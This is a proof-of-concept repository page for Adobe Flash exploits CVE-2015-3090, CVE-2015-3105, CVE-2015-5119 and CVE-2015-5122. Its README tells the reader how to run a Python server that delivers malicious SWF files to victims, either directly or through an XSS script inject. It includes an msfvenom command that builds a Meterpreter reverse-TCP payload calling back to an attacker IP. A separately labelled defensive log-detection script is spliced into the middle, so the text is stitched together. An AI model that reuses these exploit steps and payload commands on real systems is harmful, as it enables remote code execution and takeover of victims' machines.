
CVE-2015-3090 PoC — Buffer overflow vulnerability in multiple Adobe products

Associated Vulnerability
Title: Buffer overflow vulnerability in multiple Adobe products (CVE-2015-3090)
Description: Adobe Flash Player, Adobe AIR SDK, and Adobe AIR SDK & Compiler are all products of the US company Adobe. Adobe Flash Player is a multimedia player; Adobe AIR SDK and Adobe AIR SDK & Compiler are standard development kits for Adobe AIR (a cross-operating-system runtime environment). A security vulnerability exists in multiple Adobe products. An attacker can exploit it to execute arbitrary code or cause a denial of service (memory corruption). The following products and versions are affected: those based on Windows and OS
Description
Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.
Readme
# Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 Python3 Script

## Information

This script will host a web server that can exploit one of the following Adobe Flash vulnerabilities at a time:

1. CVE-2015-3090
2. CVE-2015-3105
3. CVE-2015-5119
4. CVE-2015-5122

## Execute

You must make changes ([outlined here](#modifications)) to [exploit.py](exploit.py) to suit your needs.

### Modifications

- `hostname = "192.168.1.100"`
  - This is an IP on the attacking system that will host the exploit web server.
- `serverPort = 8080`
  - This is the port on the attacking system that will host the exploit web server.
- `xss = False`
  - If set to `True`, then the victim's first request to the server is treated as JavaScript:
    - Example XSS Inject:
      - `<script src="http://192.168.1.100:8080/"></script>`
    - Attack path:
      - Victim request 1 -> XSS vulnerable server:
        - Victim accesses XSS inject on a remote server that requests a JavaScript file (see request 2).
      - Victim request 2 -> JavaScript source on attacking system.
      - Victim request 3 -> Malicious swf file.
  - If set to `False`, then the victim's first request to the server is treated as HTML:
    - Example:
      - `http://192.168.1.100:8080/`
    - Attack path:
      - Victim request 1 -> HTML file on attacking system.
      - Victim request 2 -> Malicious swf file.
- `base64Payload = "..."`
  - This is the base64 payload that will be executed on the victim system.
  - Modify the example command below to suit your needs and generate your payload:
    - Example:
      - `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64`
    - > Note: The only payload that has worked for me is `windows/meterpreter/reverse_tcp`.
- `swfFile = swfFileList['37368']`
  - Select the Adobe Flash exploit swf file to use for exploiting the victim system:
    - ```python
      swfFileList = {
          '37368': 'CVE-2015-3090.swf',
          '37448': 'CVE-2015-3105.swf',
          '37523': 'CVE-2015-5119.swf',
          '37599': 'CVE-2015-5122.swf'
      }
      ```
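From a defender's side, the delivery chain described above (a first-stage HTML or JavaScript fetch, then a `.swf` from the same host and port) is a pattern that can be flagged in proxy logs. The following is an added example, not part of the original PoC or its README; the squid-like log format and the sample lines are constructed, and the 60-second window is an assumed threshold.

```python
# Added example (not part of the original PoC): flag clients whose requests match
# the chain described in the README: an HTML or JavaScript fetch from a host:port,
# followed shortly by a .swf from that same host:port. Log format is constructed.
import re
from collections import defaultdict
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+(?P<ctype>\S+)$"
)
FIRST_STAGE = {"text/html", "application/javascript", "text/javascript"}
SWF_TYPES = {"application/x-shockwave-flash"}

def parse_line(line):
    """Parse one constructed-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = float(rec["ts"])
    u = urlsplit(rec["url"])
    rec["origin"] = u.netloc.lower()  # host:port the object was fetched from
    rec["is_swf"] = u.path.lower().endswith(".swf") or rec["ctype"] in SWF_TYPES
    return rec

def find_flash_delivery_chains(lines, window=60.0):
    """Return (client, origin, swf_url) for each .swf fetched within `window`
    seconds after an HTML/JS fetch by the same client from the same origin."""
    stage1 = defaultdict(list)  # (client, origin) -> timestamps of HTML/JS fetches
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["client"], rec["origin"])
        if rec["is_swf"]:
            if any(0 <= rec["ts"] - t <= window for t in stage1[key]):
                hits.append((rec["client"], rec["origin"], rec["url"]))
        elif rec["ctype"] in FIRST_STAGE:
            stage1[key].append(rec["ts"])
    return hits

# Constructed sample: client .5 follows the README's chain, client .7 does not.
SAMPLE_LOG = """\
1434000000.100 10.0.0.5 GET http://192.168.1.100:8080/ text/html
1434000001.250 10.0.0.5 GET http://192.168.1.100:8080/CVE-2015-3090.swf application/x-shockwave-flash
1434000002.000 10.0.0.7 GET http://intranet.example/news.html text/html
1434000500.000 10.0.0.7 GET http://cdn.example/player.swf application/x-shockwave-flash
"""

if __name__ == "__main__":
    for hit in find_flash_delivery_chains(SAMPLE_LOG.splitlines()):
        print("possible Flash exploit delivery chain:", hit)
```

A legitimate site that serves its own Flash content will also match, so this is a triage signal to pair with the Flash version of the requesting client, not a verdict on its own.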

### Run

Run the following command, in the same directory as the malicious swf files, to execute the Adobe Flash exploit script:

- `python3 exploit.py`

## References

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599
File Snapshot

```
[4.0K] /data/pocs/4fca3d48d2c532f23214406337b9dfc363674a62
├── [ 21K] CVE-2015-3090.swf
├── [ 22K] CVE-2015-3105.swf
├── [ 48K] CVE-2015-5119.swf
├── [ 42K] CVE-2015-5122.swf
├── [6.3K] exploit.py
└── [2.6K] README.md

0 directories, 6 files
```